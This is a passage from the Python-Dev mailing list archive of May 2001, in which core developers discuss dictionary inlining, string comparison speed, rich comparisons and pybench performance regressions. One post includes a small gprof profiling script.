In-Reply-To: Your message of "Fri, 18 May 2001 17:00:21 +0200."
             <20010518170021.B16811@xs4all.nl> 
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> <200105181505.KAA16890@cj20424-a.reston1.va.home.com>  
            <20010518170021.B16811@xs4all.nl> 
Message-ID: <200105181527.KAA19923@cj20424-a.reston1.va.home.com>

> > (I guess he means the buffer is alloc'ed contiguously with the dict
> > object head.  That's often a nice strategy.  Could do that for small
> > lists too maybe, except those haven't gotten anybody's attention just
> > yet.)
> 
> Sounds to me like it would benifit tuples even more than lists or dicts. At
> least in my code, I see more short tuples than short lists, and they are
> usually not altered after creation ;-)

Which is why tuples already have this feature.

Posted before your first cup of coffee? :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik at effbot.org  Fri May 18 17:36:39 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Fri, 18 May 2001 17:36:39 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1
References: <E150lag-0007Ay-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <004401c0dfb0$57b7df00$e46940d5@hagrid>

guido wrote:
> A much improved HTML parser -- a replacement for sgmllib.  The API is
> derived from but not quite compatible with that of sgmllib, so it's a
> new file.  I suppose it needs documentation, and htmllib needs to be
> changed to use this instead of sgmllib, and sgmllib needs to be
> declared obsolete.

any reason this cannot be made compatible with sgmllib?

Cheers /F


From thomas at xs4all.net  Fri May 18 17:36:42 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Fri, 18 May 2001 17:36:42 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <200105181527.KAA19923@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 11:27:39AM -0400
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> <200105181527.KAA19923@cj20424-a.reston1.va.home.com>
Message-ID: <20010518173642.S16791@xs4all.nl>

On Fri, May 18, 2001 at 11:27:39AM -0400, Guido van Rossum wrote:
> > > (I guess he means the buffer is alloc'ed contiguously with the dict
> > > object head.  That's often a nice strategy.  Could do that for small
> > > lists too maybe, except those haven't gotten anybody's attention just
> > > yet.)
> > 
> > Sounds to me like it would benifit tuples even more than lists or dicts. At
> > least in my code, I see more short tuples than short lists, and they are
> > usually not altered after creation ;-)
> 
> Which is why tuples already have this feature.
> 
> Posted before your first cup of coffee? :-)

No, after my last meeting, before my first witbier of the
friday-afternoon-office-beer-binge :) TGIF ;)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From guido at digicool.com  Fri May 18 17:49:25 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 11:49:25 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1
In-Reply-To: Your message of "Fri, 18 May 2001 17:36:39 +0200."
             <004401c0dfb0$57b7df00$e46940d5@hagrid> 
References: <E150lag-0007Ay-00@usw-pr-cvs1.sourceforge.net>  
            <004401c0dfb0$57b7df00$e46940d5@hagrid> 
Message-ID: <200105181549.KAA20101@cj20424-a.reston1.va.home.com>

> guido wrote:
> > A much improved HTML parser -- a replacement for sgmllib.  The API is
> > derived from but not quite compatible with that of sgmllib, so it's a
> > new file.  I suppose it needs documentation, and htmllib needs to be
> > changed to use this instead of sgmllib, and sgmllib needs to be
> > declared obsolete.
> 
> any reason this cannot be made compatible with sgmllib?

The sgmllib API design has a few real bogosities.  I can't recall what
they were, but we looked into keeping it compatible, and it wasn't
worth the pain.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Fri May 18 18:57:34 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 12:57:34 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Thu, 17 May 2001 21:45:29 +0200."
             <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> 
References: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>  
            <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> 
Message-ID: <200105181657.LAA20517@cj20424-a.reston1.va.home.com>

> According to the CVS log, this implementation of do_cmp was installed
> in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific
> rationale for doing do_cmp in that order?

You can ask me directly, loewis. :-)

I believe that my thinking at the time was that tp_compare should only
be used as a final fallback, just before comparing by address.  This
was consistent with my desire to completely get rid of tp_compare.

But until that is done, I now agree that it makes more sense to try
tp_compare first when a three-way-compare is requested -- especially
in the light of sequence comparison.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas at python.ca  Fri May 18 19:37:33 2001
From: nas at python.ca (Neil Schemenauer)
Date: Fri, 18 May 2001 10:37:33 -0700
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <3B04CEAC.57251CD7@lemburg.com>; from mal@lemburg.com on Fri, May 18, 2001 at 09:26:36AM +0200
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com>
Message-ID: <20010518103733.A22185@glacier.fnational.com>

M.-A. Lemburg wrote:
> FYI, I have a patch which inlines small dictionaries directly
> into the type object (rather than usin malloc to allocate
> the slot buffer).

Would it be faster to inline an association table rather than a
hash table?

 Neil


From guido at digicool.com  Fri May 18 19:43:45 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 13:43:45 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 10:37:33 PDT."
             <20010518103733.A22185@glacier.fnational.com> 
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com>  
            <20010518103733.A22185@glacier.fnational.com> 
Message-ID: <200105181743.MAA26532@cj20424-a.reston1.va.home.com>

> Would it be faster to inline an association table rather than a
> hash table?

What's an association table?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas at python.ca  Fri May 18 20:15:59 2001
From: nas at python.ca (Neil Schemenauer)
Date: Fri, 18 May 2001 11:15:59 -0700
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <200105181743.MAA26532@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 01:43:45PM -0400
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com>
Message-ID: <20010518111559.A22344@glacier.fnational.com>

Guido van Rossum wrote:
> What's an association table?

A table of keys and values.  Values are looked up by looping over
the table comparing each key until the correct one is found (ie.
its O(n) where n is the size of the table).  For Python, the cost
of doing compares probably outweighs the cost of doing the
hashing, even for small tables.

Its not clear to me though if it would be a win.  Assuming that
interned strings are the most common key, a assocation table with
four entries would take on average two pointer compares to look
up a value.

  Neil


From mal at lemburg.com  Fri May 18 20:15:37 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 20:15:37 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
Message-ID: <3B0566C9.90F17DB1@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > FYI, I have a patch which inlines small dictionaries directly
> > into the type object
> 
> You don't mean that, but how about uploading the patch to SF anyway?  Assign
> it to me and I'll dig into it.

There you go:

https://sourceforge.net/tracker/?func=detail&aid=425242&group_id=5470&atid=305470
 
-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Fri May 18 20:23:55 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 14:23:55 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 11:15:59 PDT."
             <20010518111559.A22344@glacier.fnational.com> 
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com>  
            <20010518111559.A22344@glacier.fnational.com> 
Message-ID: <200105181823.NAA32234@cj20424-a.reston1.va.home.com>

> Guido van Rossum wrote:
> > What's an association table?
> 
> A table of keys and values.  Values are looked up by looping over
> the table comparing each key until the correct one is found (ie.
> its O(n) where n is the size of the table).  For Python, the cost
> of doing compares probably outweighs the cost of doing the
> hashing, even for small tables.
> 
> Its not clear to me though if it would be a win.  Assuming that
> interned strings are the most common key, a assocation table with
> four entries would take on average two pointer compares to look
> up a value.
> 
>   Neil

I see.  At the cost of yet another algorithm, of course.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From James_Althoff at i2.com  Fri May 18 21:10:11 2001
From: James_Althoff at i2.com (James_Althoff at i2.com)
Date: Fri, 18 May 2001 12:10:11 -0700
Subject: [Python-Dev] Re: Simulating Class (was Re: Does Python have Class methods)
Message-ID: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>

Python-dev'ers,

Pardon the intrusion, but Aahz Maruch suggested that I post this to the
python-dev list.  The message below illustrates "yet another class method
recipe" that Costas synthesized (and which I then modified very slightly)
from various posts following another discussion on python-list about class
methods (as we all await the "type/class healing" stuff some of you are
working on -- go team!).  This variant uses explicit "metaclasses" (defined
as regular classes) whose instances ("meta objects") point to class objects
(since they cannot *be* class objects in current Python).   Anyway, I think
the approach has some nice properties.

Best regards,

Jim


----- Forwarded by James Althoff/AMER/i2Tech on 05/18/01 11:23 AM -----
                                                                                                               
                    James Althoff                                                                              
                                         To:     python-list at python.org                                        
                    05/14/01 02:09       cc:                                                                   
                    PM                   Subject:     Re: Simulating Class (was Re: Does Python have Class     
                                         methods)(Document link: James Althoff)                                
                                                                                                               

Costas writes:
>Ok, so after looking thru how Python works and comments from people, I
>came up with what I believe may be the best way to implement Class
>methods and Class variables.
>
><snip>
>
>Costas

I think this idea is quite good.  I would amend it very slightly by
suggesting the convention of defining *three* separate names in the
enclosing module:

1) the name of the enclosing class
2) the name of the singleton instance of the enclosing class
3) the name of the enclosed class

To support this, I would propose using a naming convention as below.

If one is interested in defining a class Spam, then use the following
names:

1) SpamMetaClass  -- names the enclosing class
2) SpamMeta  --  names a singleton instance of the enclosing class
3) Spam  --  names the enclosed class

Use the name SpamMetaClass when you need to derive a subclass of
SpamMetaClass, e.g.,

class SpecialSpamMetaClass(SpamMetaClass): pass

Use the name SpamMeta to invoke a class method, e.g.,

SpamMeta.aClassMethod()

Use the name Spam to make instances as usual, e.g.,

s = Spam()

(and to derive a subclass of Spam).

Although SpamMetaClass is not a metaclass in the sense of Smalltalk or Ruby
-- that is to say, the class Spam is not an instance of SpamMetaClass --
nonetheless, SpamMetaClass still acts as a "higher level" class that
provides methods on behalf of the class Spam where said methods are 1)
independent of any particular instance of Spam and 2) allow for
factory-method-style creation of Spam instances -- these being two very
important attributes of the metaclass concept.  Plus "meta" is a nice,
short name.  :-)   Plus using "MetaClass" to refer to the class and "Meta"
to refer to the singleton instance of "MetaClass" is reasonably clear and
succinct, I think.

One nice thing about the proposed recipe is that the SpamMeta object is a
real class instance of a real class.  This means that -- unlike when using
the "module function" recipe -- we get inheritance of methods, and --
unlike when using the "callable wrapper class" recipe -- we also get
override of methods.

The example below illustrates both of these important capabilities.


class Class1MetaClass:  # Base metaclass

    # Define "class methods" for Class1

    def whoami(self):
        print 'Class1MetaClass.whoami:', self

    def new(self):  # Factory method
        """Return a new instance"""
        return self.Class1()

    def newList(self,n=3):  # Another factory method
        """Return a list of new instances"""
        l = []
        for i in range(n):
            newInstance = self.new()
            l.append(newInstance)
        return l

    # Define Class1 & its "instance methods"

    class Class1:  # Base class

        def whoami(self):
            print 'Class1.whoami:', self


Class1Meta = Class1MetaClass()  # Make & name the singleton metaclass
instance
Class1 = Class1Meta.Class1  # Make the Class1 name accessible


class Class2MetaClass(Class1MetaClass):  # Derived metaclass

    # Define "class methods" for Class2 -- Override Class1 "class methods"

    def whoami(self):
        print 'Class2MetaClass.whoami:', self

    def new(self):  # Override the factory method
        return self.Class2()

    # Define Class2 & its "instance methods"

    class Class2(Class1):  # Derived class

        def whoami(self):
            print 'Class2.whoami:', self

Class2Meta = Class2MetaClass()  # Make & name the singleton metaclass
instance
Class2 = Class2Meta.Class2  # Make the Class2 name accessible


# Test

Class1Meta.whoami()  # invoke "class method" of base class
Class2Meta.whoami()  # invoke "class method" of derived class

Class1().whoami()  # make an instance & invoke "instance method"
Class2().whoami()

print Class1Meta.newList()  # factory method
print Class2Meta.newList()  # inherit factory method with override

>>> reload(meta6)
Class1MetaClass.whoami: <meta6.Class1MetaClass instance at 00810DBC>
Class2MetaClass.whoami: <meta6.Class2MetaClass instance at 00812D6C>
Class1.whoami: <meta6.Class1 instance at 0081058C>
Class2.whoami: <meta6.Class2 instance at 0081058C>
[<meta6.Class1 instance at 0081147C>, <meta6.Class1 instance at 0081151C>,
<meta6.Class1 instance at
 0081009C>]
[<meta6.Class2 instance at 0081147C>, <meta6.Class2 instance at 00810CCC>,
<meta6.Class2 instance at
 0081009C>]
<module 'meta6' from 'c:\_dev\python20\meta6.py'>


Jim


From tim.one at home.com  Fri May 18 21:26:02 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 18 May 2001 15:26:02 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <3B0509BF.A2F84A30@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEBGKDAA.tim.one@home.com>

[MAL]
> It [pybench] doesn't claim "typical use". pybench is aimed at finding
> out performance issues about hot-spots -- there's no such thing as
> a "typical program", so pybench gives you low level performance
> compares for very specific tasks, e.g. dictionary creation or
> for-loop performance.
>
> I have found it to be rather successful at that. At least gives
> some good hints at where to look...

There must be a misunderstanding here.  I understand and appreciate all that!

From tim.one at home.com  Fri May 18 21:48:33 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 18 May 2001 15:48:33 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <20010518111559.A22344@glacier.fnational.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBJKDAA.tim.one@home.com>

[Neil Schemenauer]
> A table of keys and values.  Values are looked up by looping over
> the table comparing each key until the correct one is found (ie.
> its O(n) where n is the size of the table).  For Python, the cost
> of doing compares probably outweighs the cost of doing the
> hashing, even for small tables.

I thought about that before.  The inlining appeals but the algorithm not
much:  the dict implementation *as is* loops over all the table entries too,
except that instead of starting with "i = 0" it starts (now) with "i = hash &
mask"; instead of incrementing via "++i" it does "i <<= 1; if (i > mask) i ^=
poly"; and instead of giving up when "i >= length" it punts when finding an
entry with a null value.  Incrementing via ++i is certainly cheaper, except
that even when small, the hash table usually hits on the first try when the
key is present, so usually gets out before incrementing.

> Its not clear to me though if it would be a win.

Best guess is not.

> Assuming that interned strings are the most common key, a assocation
> table with four entries would take on average two pointer compares
> to look up a value.

Actually an average of 2.5 when the key is present and each key is equally
likely to be queried, and always 4 when the queried key is not present.  The
hash table has better expected stats on both counts, but needs 4 unused slots
too to achieve that.  The savings would be in memory for small dicts more
than in time (if at all).


From jeremy at alum.mit.edu  Fri May 18 23:07:37 2001
From: jeremy at alum.mit.edu (Jeremy Hylton)
Date: Fri, 18 May 2001 17:07:37 -0400 (EDT)
Subject: [Python-Dev] explanations for more pybench slowdowns
Message-ID: <200105182107.RAA16214@cliff.concentric.net>

I did some profiles of more of the pybench slowdowns this afternoon
and found a few causes for several problem benchmarks.

I just made a couple of small changes for BuiltinFunctionCalls.  The
problem here is that PyCFunction calls were optimized for flags == 0
and not flags == METH_VARARGS, which is more common.

The scary thing about BuiltinFunctinoCalls is that the profiler shows
it spending almost 30% of its time in PyArg_ParseTuple().  It
certainly is a shame that we have this complicated, slow run-time
parsing mechanism to deal with a static property of the code, namely
how many arguments it takes and whether their types are.

A few of the other tests, SimpleComplexArithmetic and
CreateStringsWithConcat, are slower because of the new coercion
logic.  I didn't spend much time on SimpleComplexArithmetic, but I did
look at CreateStringsWithConcat in some detail.  The basic problem is
that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls
PyNumber_Add("ab", "cd").  This function tries all sorts of different
ways to coerce the strings into addable numbers before giving up and
trying sequence concat.

It looks like the new coercion rules have optimized number ops at the
expense of string ops.  If you're writing programs with lots of
numbers, you probably think that's peachy.  If you're parsing HTML,
perhaps you don't :-).

I looked at the test suite to see how often it is called with
non-number arguments.  The answer is 77% of the time, but almost all
of those calls are from test_unicodedata.  If that one test is
excluded, the majority of the calls (~90%) are with numbers.  But the
majority of those calls just come from a few tests -- test_pow,
test_long, test_mutants, test_strftime.

If I were to do something about the coercions, I would see if there
was a way to quickly determine that PyNumber_Add() ain't gonna have
any luck.  Then we could bail to things like string_concat more
quickly.

I also looked at SmallLists.  It seems that the only significant
change since 1.5.2 is the garbage collection.  This tests spends a lot
more time deallocating lists than it used to, and the only change I
see in the code is the GC.  I assume, but haven't checked, that the
story is similar for SmallTuples.

So the primary things that have slowed down since 1.5.2 seem to be:
comparisons, coercion, and memory management for containers.  These
also seem to be the things that have improved the most in terms of
features, completeness, etc.  Looks like we need to revisit them and
sort out the performance issues.

Jeremy


From guido at digicool.com  Fri May 18 23:58:25 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 17:58:25 -0400
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: Your message of "Fri, 18 May 2001 17:07:37 EDT."
             <200105182107.RAA16214@cliff.concentric.net> 
References: <200105182107.RAA16214@cliff.concentric.net> 
Message-ID: <200105182158.QAA01250@cj20424-a.reston1.va.home.com>

> The scary thing about BuiltinFunctinoCalls is that the profiler shows
> it spending almost 30% of its time in PyArg_ParseTuple().  It
> certainly is a shame that we have this complicated, slow run-time
> parsing mechanism to deal with a static property of the code, namely
> how many arguments it takes and whether their types are.

I would love to see a mechanism whereby the signature of a C function
could be stored as part of the static info about it, in an extension
of the PyMethodDef structure: this would serve as documentation, allow
for introspection, etc.  I'm sure Ping would love this for pydoc and
his inspect module.

But I'm not sure how much we can speed things up, unless we give up on
the tuple interface (an argc/argv API could be much faster since
usually the arguments are already on the frame's stack in this form).

> A few of the other tests, SimpleComplexArithmetic and
> CreateStringsWithConcat, are slower because of the new coercion
> logic.  I didn't spend much time on SimpleComplexArithmetic, but I did
> look at CreateStringsWithConcat in some detail.  The basic problem is
> that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls
> PyNumber_Add("ab", "cd").  This function tries all sorts of different
> ways to coerce the strings into addable numbers before giving up and
> trying sequence concat.
> 
> It looks like the new coercion rules have optimized number ops at the
> expense of string ops.  If you're writing programs with lots of
> numbers, you probably think that's peachy.  If you're parsing HTML,
> perhaps you don't :-).
> 
> I looked at the test suite to see how often it is called with
> non-number arguments.  The answer is 77% of the time, but almost all
> of those calls are from test_unicodedata.  If that one test is
> excluded, the majority of the calls (~90%) are with numbers.  But the
> majority of those calls just come from a few tests -- test_pow,
> test_long, test_mutants, test_strftime.
> 
> If I were to do something about the coercions, I would see if there
> was a way to quickly determine that PyNumber_Add() ain't gonna have
> any luck.  Then we could bail to things like string_concat more
> quickly.

There's already a special case for int+int in the BINARY_ADD opcode
(otherwise you would probably see more numbers).  Maybe another
special case for str+str would help here?

> I also looked at SmallLists.  It seems that the only significant
> change since 1.5.2 is the garbage collection.  This tests spends a lot
> more time deallocating lists than it used to, and the only change I
> see in the code is the GC.  I assume, but haven't checked, that the
> story is similar for SmallTuples.
> 
> So the primary things that have slowed down since 1.5.2 seem to be:
> comparisons, coercion, and memory management for containers.  These
> also seem to be the things that have improved the most in terms of
> features, completeness, etc.  Looks like we need to revisit them and
> sort out the performance issues.

Thanks for doing all this work, Jeremy!

I just hope that these performance hacks won't have to be redone when
I'm done with healing the types/class split.  I'm expecting that
things can become a lot simpler if everything inherits from Object,
sequences inherit from Sequence, and so on.  But since I'm currently
going slow on this work, I won't complain too much if the existing
code gets optimized first.  The stuff you already checked in looks
good!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jeremy at digicool.com  Sat May 19 00:06:05 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Fri, 18 May 2001 18:06:05 -0400 (EDT)
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: <200105182158.QAA01250@cj20424-a.reston1.va.home.com>
References: <200105182107.RAA16214@cliff.concentric.net>
	<200105182158.QAA01250@cj20424-a.reston1.va.home.com>
Message-ID: <15109.40141.757071.770265@slothrop.digicool.com>

In case anyone else is interested, here are two quick pointers on
running pybench tests under the profiler.

1. To build Python with profiling hooks (Unix only): 
LDFLAGS="-pg" OPT="-pg" configure
make
When you run python it produces a gmon.out file.  To run gprof, pass
it the profile-enable executable and gmon.out.  It's spit out the
results on stdout.

2. Use this handy script (below) to run a single pybench test under
   the profiler and produce the output.

Jeremy

"""Tool to automate profiling of individual pybench benchmarks"""

import os
import re
import tempfile

PYCVS = "/home/jeremy/src/python/dist/src/build-pg/python"
PY152 = "/home/jeremy/src/python/dist/Python-1.5.2/build-pg/python"

rx_grep = re.compile('^([^:]+):(.*)')
rx_decl = re.compile('class (\w+)\(\w+\):')

def find_bench(name):
    p = os.popen("grep %s *.py" % name)
    for line in p.readlines():
        mo = rx_grep.search(line)
        if mo is None:
            continue
        file, text = mo.group(1, 2)
        mo = rx_decl.search(text)
        if mo is None:
            continue
        klass = mo.group(1)
        return file, klass
    return None, None

def write_profile_code(file, klass, path):
    i = file.find(".")
    file = file[:i]
    f = open(path, 'w')
    print >> f, "import %s" % file
    print >> f, "%s.%s().run()" % (file, klass)
    f.close()

def profile(interp, path, result):
    if os.path.exists("gmon.out"):
        os.unlink("gmon.out")
    os.system("PYTHONPATH=. %s %s" % (interp, path))
    if not os.path.exists("gmon.out"):
        raise RuntimeError, "gmon.out not generated by %s" % interp
    os.system("gprof %s gmon.out > %s" % (interp, result))

def main(bench_name):
    file, klass = find_bench(bench_name)
    if file is None:
        raise ValueError, "could not find class %s" % bench_name

    code_path = tempfile.mktemp()
    write_profile_code(file, klass, code_path)

    profile(PYCVS, code_path, "%s.cvs.prof" % bench_name)
    profile(PY152, code_path, "%s.152.prof" % bench_name)

    os.unlink(code_path)

if __name__ == "__main__":
    import sys
    main(sys.argv[1])


From jim at interet.com  Sat May 19 18:45:15 2001
From: jim at interet.com (James C. Ahlstrom)
Date: Sat, 19 May 2001 12:45:15 -0400
Subject: [Python-Dev] [off topic] Python is taking over the world
Message-ID: <3B06A31B.67A8D010@interet.com>

I was in my local (Sommerville, NJ) Borders book store
last week and noticed that they stocked many Python books,
most in multiple copies.  It all added up to three feet
of Python books.  Great.

The clincher was when I went to my YMCA, and saw that
someone had posted a flyer offering tutoring in Math,
Physics, Java and Python.

Congratulations to Guido and all on this list.

JimA


From guido at digicool.com  Sun May 20 01:18:25 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 19 May 2001 19:18:25 -0400
Subject: [Python-Dev] Off-topic: So long, and thanks for all the fish
Message-ID: <200105192318.TAA02405@cj20424-a.reston1.va.home.com>

For all you Douglas Adams fans out there:

    Douglas Noel Adams
       1952 - 2001

http://www.douglasadams.com

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Sun May 20 11:31:25 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 05:31:25 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEFBKDAA.tim.one@home.com>

[M0artin v. Loewis]
> ...
> If I set tp_richcompare of strings to 0, I get past this code, and do
>
> 		c = (*f)(v, w);
> 		if (PyErr_Occurred())

Note that the usual way to write this is

 		if (c < 0 && PyErr_Occurred())

More work for my artificial "ab" < "cd" case but a net win in real life (when
c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas,
when c < 0 there's no way in the cmp protocol to use c's value alone to
distinguish between "less than" and "error").

> 			return NULL;
> 		return convert_3way_to_object(op, c);
>
> Here, I get 3 function calls: f is string_compare, then
> PyErr_Occurred, finally convert_3way_to_object, which converts
> {-1,0,1} x Op -> {Py_True, Py_False}.

Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf.

> Indeed, when I inline convert_3way_to_object, I get the same speed in
> both cases (with the remaining differences attributed to measurement
> and gcc doing register usage differently in both functions).

OK, understood, and thanks for following up!

> I'd still be in favour of giving strings a richcompare, since it
> allows to optimize what I think is the single most frequent case:
> Py_EQ on strings.

In the absence of significant sorting, I agreed Py_EQ is most frequent.

> With a control flow like
>
> 		if (a->ob_size != b->ob_size)
>                    goto False;
>
> 		if (a->ob_size == 0)
>                    goto True;
>
> 		if (a->ob_sval[0] != b->ob_sval[0])
>                    goto False;
>
> 		if(memcmp(a->ob_sval, b->ob_sval, a->ob_size))
>                    goto False;
>                 else
>                    goto True;
>
> we can reduce the number of function calls

Suggest collapsing the third into the first:

		if (a->ob_size != b->ob_size
                || a->ob_sval[0] != b->ob_sval[0])
                    goto False;

There's no danger of over-indexing when ob_size==0, because it doesn't
include the trailing null byte Python always sticks at the end of string
objects; and the first-byte check is much more likely to pay off than the
zero-length check (comparison to a null string?  gotta be rare as clear
conclusions <wink>), and better to test for the more common case first.


From tim.one at home.com  Sun May 20 11:54:08 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 05:54:08 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEFBKDAA.tim.one@home.com>

[Tim]
>> 1. String objects are also equal despite being different objects,
>>    if their ob_sinterned pointers are equal and non-NULL.  So if
>>    you're looking for every trick in & out of the book, that's
>>    another one.

[Martin v. Loewis]
> That does not help. In the entire test suite, there are 0 instances
> where strings are compared which are not identical, but have equal
> ob_sinterned pointers.

Good to know.  Had you tried this a few weeks ago, there would have been
thousands (it so happened that one-character strings weren't being interned
*effectively*, and there were lots of 1-character cases then where #1
applied; that's been fixed; good to know more aren't popping up).

> ...
> Whether there's a fruitless branch depends on your compiler.

A branch instruction is a branch instruction; I didn't distinguish between
taken and non-taken branches, as there's no uniformity in codegen across
platforms.

> With gcc 3, you can write
>
> 	if (__builtin_expect(a == b, 0)) {
>
> and then the body of the if block will be moved out of the way of
> linear control flow.

I don't think we'll be littering Python with compiler-specific hacks.  It's
good to get the less common case out-of-line, but it's not a pure win:  while
it reduces the penalty when the test doesn't pay, it also reduces the benefit
when it does pay (by the wildly architecture-dependent cost of taking a
mispredicted out-of-line branch, and the wildly compiler-dependent costs of
how seriously they take their own decisions or user hints to out-of-line a
block (e.g., the compiler may refetch everything from memory again at the
target if it thinks it's truly rare)).

>> Any idea where those 800,000 virgin calls to oldcomp are coming
>> from?  That's a lot.

> As far as I could trace it, most of them come from lookdict_string (at
> various locations inside this function).

Ah!  Of course.  string_compare is hardwired into lookdict_string.  This case
may be important enough to merit a distinct _PyString_Equal function, with
just the stuff lookdict_string needs (e.g., there's never a gain in testing
for pointer equality when called from lookdict_string because the dict code
already checked that; but there may be a gain for that test in an all-purpose
string_richcompare).

> ...
> So to support sorting better, I should special-case Py_LT in
> string_richcompare also, to avoid the function call ?-)

Of course.  string_richcompare has to do a memcmp to resolve Py_EQ and Py_NE
anway, and that's most of the work for resolving all 6 possibilities.  Get
rid of string_compare entirely!

[on cmp sloth]
> Yes, that is a serious problem. Fortunately, very few calls in my
> programs go to string_compare through cmp() now. But then, your
> programs are different, of course...

There are search-tree modules I have but didn't write that do this; I don't
care enough about them to frustrate Guido's grand vision <wink>>

It may be more important for sequences other than 8-bit strings, as each call
to a comparison function for a pair of non-string sequences is very expensive
(involving more layers of calls for each element comparison).


From tim.one at home.com  Sun May 20 12:13:14 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 06:13:14 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com>

[Guido]
> I have always thought that eventually (but long before Py3K!) all
> objects would only support rich comparisons and the __cmp__ and
> tp_compare slots would become completely obsolete.

If the time machine batteries can hold a full charge, you may want to go back
and add Py_CMP as a seventh possible desired-operation argument to tbe rich
comparison API.  My experience with dict comparisons was that
dict_richcompare couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a
full cmp, so I put the dict oldcmp back in order to avoid having dict richcmp
(potentially) compute cmp 3 times to fake one cmp.  But if dict richcmp knew
a cmp outcome was desired, it could compute it with no extra work to speak
of.  Then there would be no reason at all to hold on to the dict tp_compare
slot.

The list and tuple richcmps are also doing almost all the work needed to
compute a 3-way cmp outcome.


From tim.one at home.com  Sun May 20 13:05:53 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 07:05:53 -0400
Subject: [Python-Dev] Performance compares
